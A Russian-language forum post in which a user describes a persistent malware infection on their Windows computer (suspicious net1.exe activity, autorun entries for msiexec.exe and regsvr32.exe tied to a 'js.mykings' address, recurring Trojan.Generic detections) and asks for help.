Перейти к содержанию

Remote Access Trojan и не только


Рекомендуемые сообщения

Так как длится этот хаос на моем компьютере уже некоторое время, полностью описать хронологию событий вряд ли смогу. В один прекрасный день антивирус(360 Total Security) заблокировал процесс, с именем состоящим только из цифр, расположенный в корневом каталоге диска С. После этого через некоторое время началась полная вакханалия. Антивирус начал регулярно блокировать процесс с именем net1.exe, который якобы пытается изменить какой-то пароль. При этом в это же время происходят различные изменения в реестре, одно из этих изменений - внесение в автозагрузку двух процессов, а именно, msiexec.exe и regsvr32.exe, оба имеют дальше в названии адрес сайта(даю только часть адреса) - js.mykings, я плохо разбираюсь в компьютерах, но мне показалось что этого там быть не должно, по этому адресу начал искать подобные проблемы у других людей, и нашел их немало. Помимо процессов в автозагрузке, добавляется скрипт в программу system32\wbem\wbemtest,exe, в названии этого скрипта присутствует мат, его я удалил, процессы из автозагрузки убрал, какое-то время ничего не происходило. Но к концу дня все вернулось обратно. Вчера помимо этого, появилось два exe процесса в папке Temp, один из них создал файл 360.cn в папке Program Files\Google, антивирус заблокировал процесс, он выдал ошибку приложения, я его закрыл, и больше он о себе не давал знать, но файлы не удалял. Сегодня снова появился файл с сомнительным названием в корневом каталоге диска C, он создал процесс с именем win32.exe в папке system32, антивирус расценил его как Trojan.Generic и удалил, но файл который создал этот процесс, так и остался в корневом каталоге, его ни я, ни антивирус не удалял.

 

Теперь некоторые особенности и ссылки на ресурсы, которые имеют полезную информацию и лучше объяснят в чем проблема.

-иногда в процессах ненадолго всплывают два от Adobe - acrord32.exe или что-то вроде того.